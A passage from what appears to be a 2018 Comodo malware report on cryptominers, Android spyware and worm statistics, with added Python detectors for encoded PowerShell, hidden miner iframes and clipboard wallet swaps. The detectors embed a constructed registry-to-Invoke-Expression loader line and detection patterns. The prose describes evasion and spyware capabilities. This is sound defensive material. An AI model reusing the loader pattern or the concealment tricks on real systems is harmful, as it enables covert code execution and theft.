If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing, running process by the PowerShell script.

BadShell at work


The malicious code in the registry
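Detection logic for the BadShell pattern described above, added here as an example and not Comodo's own tooling: it decodes the -EncodedCommand argument from process-creation log lines and scores the decoded script for a registry read that feeds a base64 blob into Invoke-Expression, plus a hidden window and a Task Scheduler parent process. The log format, the trait weights and both encoded commands are constructed for this example.

```python
# Added example (not Comodo's tooling): score PowerShell launches in
# process-creation logs for the BadShell traits described above.
import base64
import re
from dataclasses import dataclass, field

# -EncodedCommand and the unambiguous prefixes PowerShell accepts (-enc, -ec, -e).
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')  # key=value, quotes allow spaces

# Assumed weights; tune against your own telemetry.
SCRIPT_TRAITS = [
    ("registry_read", re.compile(r"Get-ItemProperty|HKCU:|HKLM:|Registry::", re.I), 2),
    ("base64_blob", re.compile(r"FromBase64String", re.I), 2),
    ("dynamic_exec", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
]
CMDLINE_TRAITS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I), 1),
]
# Task Scheduler engine on Windows 7-era hosts; newer builds run the Schedule
# service inside svchost.exe, so correlate with the service name there.
SCHEDULER_PARENTS = {"taskeng.exe"}
ALERT_THRESHOLD = 5


@dataclass
class Finding:
    host: str
    score: int = 0
    traits: list = field(default_factory=list)
    decoded: str = ""

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def parse_line(line: str) -> dict:
    """Split a key=value log line into a dict."""
    return {key: (quoted or raw) for key, raw, quoted in FIELD_RE.findall(line)}


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script behind -EncodedCommand, '' if absent/undecodable."""
    match = ENC_RE.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event: dict) -> Finding:
    """Score one PowerShell launch; Finding.alert is True when it needs review."""
    cmdline = event.get("cmdline", "")
    finding = Finding(host=event.get("host", "?"))
    finding.decoded = decode_encoded_command(cmdline)
    if finding.decoded:
        finding.traits.append("encoded_command")
        finding.score += 1
    checks = [(n, r, w, cmdline) for n, r, w in CMDLINE_TRAITS]
    checks += [(n, r, w, finding.decoded) for n, r, w in SCRIPT_TRAITS]
    for name, regex, weight, text in checks:
        if regex.search(text):
            finding.traits.append(name)
            finding.score += weight
    if event.get("parent", "").rsplit("\\", 1)[-1].lower() in SCHEDULER_PARENTS:
        finding.traits.append("scheduled_task_parent")
        finding.score += 2
    return finding


def scan(lines) -> list:
    """Score every PowerShell launch in the log, preserving order."""
    return [score_event(parse_line(ln)) for ln in lines if "powershell.exe" in ln.lower()]


def encode_ps(script: str) -> str:
    """base64(UTF-16LE) as PowerShell expects; used here to build the samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed script mirroring the pattern above: a registry value is read,
# base64-decoded and handed to Invoke-Expression.
SUSPICIOUS_SCRIPT = (
    "$d=(Get-ItemProperty 'HKCU:\\Software\\ExampleVendor\\Cache').Blob;"
    "IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($d)))"
)
BENIGN_SCRIPT = "Get-Service WinRM | Select-Object Status"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = [  # constructed process-creation events
    f"ts=2018-05-14T09:12:03Z host=WS-017 image={PS} parent=C:\\Windows\\System32\\taskeng.exe "
    f'cmdline="powershell.exe -NoP -W Hidden -enc {encode_ps(SUSPICIOUS_SCRIPT)}"',
    f"ts=2018-05-14T09:15:40Z host=WS-020 image={PS} parent=C:\\Windows\\explorer.exe "
    f'cmdline="powershell.exe -EncodedCommand {encode_ps(BENIGN_SCRIPT)}"',
    f"ts=2018-05-14T09:16:02Z host=WS-021 image={PS} parent=C:\\Windows\\explorer.exe "
    'cmdline="powershell.exe -File C:\\scripts\\inventory.ps1"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.host}: score={f.score} alert={f.alert} traits={f.traits}")
```

The decoded script is kept on each finding so an analyst can read what the encoded argument actually ran, which is the step the screenshots above illustrate.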


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to the cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature – it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task – mining cryptocurrency. The other runs in the background, looking for antivirus products, and disables them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.

WinstarNssmMiner spreading around the world

Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out against other cryptominers with a "kill list" feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.

The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.

In this way CoinMiner takes undivided possession of the victim's computer, using its resources to mine cryptocurrency.

Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide. CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and in cybersecurity reports, users have started checking websites' code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.

As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make it as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we find the familiar link to CoinHive.

The link to CoinHive

What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
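The camouflage described above (an encoded string that decodes to a 1x1 iframe pointing at a URL shortener) is something a site owner can scan for in their own pages. The following is an added example, not code from the report or from Comodo: it recovers strings passed to unescape() and atob() in the markup, then flags any iframe that is invisible or whose host is a known shortener front. Only the cnhv.co host comes from the report; the sample pages, helper names and scoring rules are assumptions.

```python
"""Scan page markup for a cryptominer loader hidden behind an encoded 1x1 iframe.

Added example, not code from the Comodo report. The only indicator taken from
the report is the cnhv.co shortener host; the sample pages, the decoding
helpers and the scoring rules are constructed assumptions.
"""
import base64
import html
import re
import urllib.parse

# Shortener hosts seen fronting a miner script. cnhv.co is the one the report
# shows; a defender would extend this set from their own telemetry.
SHORTENER_HOSTS = {"cnhv.co"}

# Encoded-string carriers that obfuscated loaders commonly use.
_UNESCAPE_RE = re.compile(r"""unescape\(\s*['"]([^'"]*)['"]\s*\)""")
_ATOB_RE = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
_IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
_ATTR_RE = re.compile(r"""([A-Za-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def decode_layers(markup: str) -> str:
    """Return the markup joined with every string recovered from unescape()/atob().

    The pass is repeated a bounded number of times because loaders are sometimes
    wrapped twice; layers already seen are not added again.
    """
    layers = [markup]
    queue = [markup]
    for _ in range(3):
        new = []
        for text in queue:
            new.extend(urllib.parse.unquote(s) for s in _UNESCAPE_RE.findall(text))
            for s in _ATOB_RE.findall(text):
                try:
                    new.append(base64.b64decode(s, validate=True).decode("utf-8", "replace"))
                except ValueError:  # binascii.Error is a ValueError subclass
                    continue
        new = [t for t in new if t not in layers]
        if not new:
            break
        layers.extend(new)
        queue = new
    return "\n".join(layers)


def iframe_attrs(tag_body: str) -> dict:
    """Parse the attributes of one <iframe ...> tag into a lower-cased dict."""
    attrs = {}
    for m in _ATTR_RE.finditer(tag_body):
        value = next((g for g in m.groups()[1:] if g is not None), "")
        attrs[m.group(1).lower()] = html.unescape(value)
    return attrs


def is_pixel(value) -> bool:
    """True when a width/height attribute is 1 or smaller (e.g. "1", "1px", "0")."""
    if value is None:
        return False
    try:
        return float(str(value).strip().lower().rstrip("px")) <= 1
    except ValueError:
        return False


def find_hidden_loaders(markup: str) -> list:
    """Return one finding per iframe that is invisible and/or points at a shortener."""
    findings = []
    for m in _IFRAME_RE.finditer(decode_layers(markup)):
        attrs = iframe_attrs(m.group(1))
        src = attrs.get("src", "")
        host = (urllib.parse.urlsplit(src).hostname or "").lower()
        reasons = []
        if is_pixel(attrs.get("width")) and is_pixel(attrs.get("height")):
            reasons.append("1x1 iframe")
        if host in SHORTENER_HOSTS:
            reasons.append("src host %s is a known shortener front" % host)
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


# Constructed sample: a harmless page with a loader written through unescape().
SAMPLE_PAGE = (
    "<html><body><h1>Weather</h1>\n"
    '<script>document.write(unescape("%3Ciframe%20src%3D%22https%3A%2F%2Fcnhv.co'
    '%2Fexample-slug%22%20width%3D%221%22%20height%3D%221%22%3E%3C%2Fiframe%3E"));</script>\n'
    '<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>\n'
    "</body></html>"
)

# Constructed sample: the same trick carried through atob() instead.
SAMPLE_PAGE_B64 = '<script>document.write(atob("%s"));</script>' % base64.b64encode(
    b'<iframe src="https://cnhv.co/other-slug" width="1px" height="1px"></iframe>'
).decode("ascii")

if __name__ == "__main__":
    for page in (SAMPLE_PAGE, SAMPLE_PAGE_B64):
        for finding in find_hidden_loaders(page):
            print(finding["src"], "->", "; ".join(finding["reasons"]))
```

The benign 300x200 widget iframe in the sample is left alone; the scanner only reports an iframe that is invisible or that resolves to a listed shortener, so a match on both conditions is the strongest signal. Run it against saved copies of your own pages rather than against live third-party sites.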

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string combining different characters and numbers, so it is almost impossible to remember or to fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it changes it to the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack.

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
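A check at the paste step is one defensive counterpart to the swap described above. The following is an added example, not code from the report or from Comodo: it simulates a clipboard, records what the user deliberately copied, and raises an alert when the content at paste time is a different wallet address. The two addresses are the ones quoted in the report; the clipboard simulation, the address patterns and the guard design are assumptions.

```python
"""Flag a clipboard wallet-address swap before the user pastes it into a transfer.

Added example, not code from the Comodo report. The clipboard is simulated so
the flow runs anywhere; on a real host the read at paste time would come from
the OS clipboard API. The two addresses are the ones quoted in the report; the
guard design and the address patterns are constructed assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Shape checks only (alphabet and length); they do not verify a checksum.
ADDRESS_PATTERNS = {
    "btc-legacy": re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc-bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{11,71}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}

# From the report's example: what the user copied and what the hijacker put in its place.
USER_ADDRESS = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
HIJACKER_ADDRESS = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"


def address_kind(text: str) -> Optional[str]:
    """Return which address family `text` looks like, or None."""
    text = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


@dataclass
class SimulatedClipboard:
    """Stand-in for the OS clipboard; any process on the host can write to it."""
    content: str = ""


@dataclass
class ClipboardGuard:
    """Remembers what the user copied and compares it with what is about to be pasted."""
    clipboard: SimulatedClipboard
    last_user_copy: Optional[str] = None
    alerts: list = field(default_factory=list)

    def user_copied(self, text: str) -> None:
        # Called from a user-initiated copy (hotkey/menu), so this value is trusted.
        self.clipboard.content = text
        self.last_user_copy = text

    def check_before_paste(self) -> Optional[dict]:
        """Return an alert when a copied address no longer matches the clipboard."""
        expected = self.last_user_copy
        if expected is None or address_kind(expected) is None:
            return None  # nothing address-like was copied, so nothing to protect
        current = self.clipboard.content
        if current == expected:
            return None
        alert = {
            "expected": expected,
            "found": current,
            "found_kind": address_kind(current),
            "same_family": address_kind(current) == address_kind(expected),
        }
        self.alerts.append(alert)
        return alert


def replay_report_scenario() -> Optional[dict]:
    """Replay the swap described in the report against the guard (constructed run)."""
    clipboard = SimulatedClipboard()
    guard = ClipboardGuard(clipboard)
    guard.user_copied(USER_ADDRESS)
    # The hijacker bypasses the user copy path and writes straight to the clipboard.
    clipboard.content = HIJACKER_ADDRESS
    return guard.check_before_paste()


def replay_benign_scenario() -> Optional[dict]:
    """Same flow without interference: the guard stays silent."""
    clipboard = SimulatedClipboard()
    guard = ClipboardGuard(clipboard)
    guard.user_copied(USER_ADDRESS)
    return guard.check_before_paste()


if __name__ == "__main__":
    print(replay_report_scenario())
```

The guard keys on the user's own copy action rather than on polling the clipboard, so a hijacker that rewrites the buffer in between is caught at the only moment that matters, just before the paste. A wallet application can apply the same rule by comparing the pasted destination against the address the user last copied from a trusted screen.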

An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors.

4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks

Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

Version-1: Naver Defender

Version-2: Netease Defender

Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contacts, ID, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server (address as printed in the report: httphttpcgalimcomadminhrpupuphpdo=upload).

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of malware dissemination was social networks.

Version-1: Dardesh (Google Play Services Instant Apps)

Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.

4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram Groups انتخاب دھم

Version-2: Postrall Yes For Referendum انتخاب دھم

Version-3: Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机

Version-4: VPN Easy DroFirewall m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about the installed applications

Collect browser data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.

In addition to the abilities of the previous versions, it includes some additional tricks:

Extracts photos, audio and videos

Records the screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

Takes control over the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp message DB and related keys

Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader

After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contact details

Set Wi-Fi to always on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service

Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:

Send_SMS - extract SMS content and send it to the C&C server

Send_USSD - send the USSD to the C&C server

Gethistory - monitor browser history

Start_AllApp - gather info about installed applications

Send_call - set the Intent action to call

Forward_call - forward incoming calls

ResForward_call - reset call forwarding

Go_Smsmnd - delete SMS content

Go_GetAlls - get SMS history

Dell_sms - delete SMS content in a conversation

Send_spam - send spam SMS

Start_Inject - call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

contacts - get contact details and email ID

Mute - set action to mute

Mms - get MMS content

info - get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber

Version 2: Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party play stores, social networks and messengers for spreading.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton

شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Noticeably, it's sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in a variety of disguises, named above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version-1: Netflix Hack, Instagram Hack

Version-2: TSF Launcher

Version-3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2. No one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May

4.2.3 June 2018

Android-targeted malware in June

5 Malware in Q2 2018 The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial-of-service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

52 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

